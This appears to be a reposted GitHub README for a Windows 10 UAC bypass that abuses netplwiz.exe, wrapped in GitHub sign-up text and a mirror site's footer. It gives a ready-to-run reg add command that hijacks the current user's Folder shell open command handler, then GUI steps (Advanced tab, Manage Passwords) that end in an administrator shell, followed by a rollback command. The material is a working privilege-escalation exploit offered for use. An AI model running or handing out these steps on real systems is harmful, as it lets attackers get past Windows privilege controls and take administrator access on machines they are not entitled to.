GitHub - sailay1996/GUI_UAC_bypassX: gui uac bypass (netplwiz.exe)
2019-09-05 00:44:02 Author: github.com(查看原文) 阅读量:403 收藏

Join GitHub today

GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.

Sign up

gui uac bypass (netplwiz.exe)

gui uac bypass (netplwiz.exe)

  • Type: GUI Hack
  • Method: Registry key manipulation
  • Target: \system32\netplwiz.exe
  • Component(s): Attacker defined
  • Works from: window 10

HKCU\Software\Classes\Folder\shell\open\command was called when click manage passwords button in netplwiz.exe test x

Produce steps:

  • Run command
    reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c cmd.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f
  • run netplwiz.exe in cmd .
  • Select the "Advanced" tab, and click the "Manage Passwords" button.
  • then you will get Administrator Shell.
    test

Rollback command :

reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f

@404death


文章来源: https://github.com/sailay1996/GUI_UAC_bypassX
如有侵权请联系:admin#unsafe.sh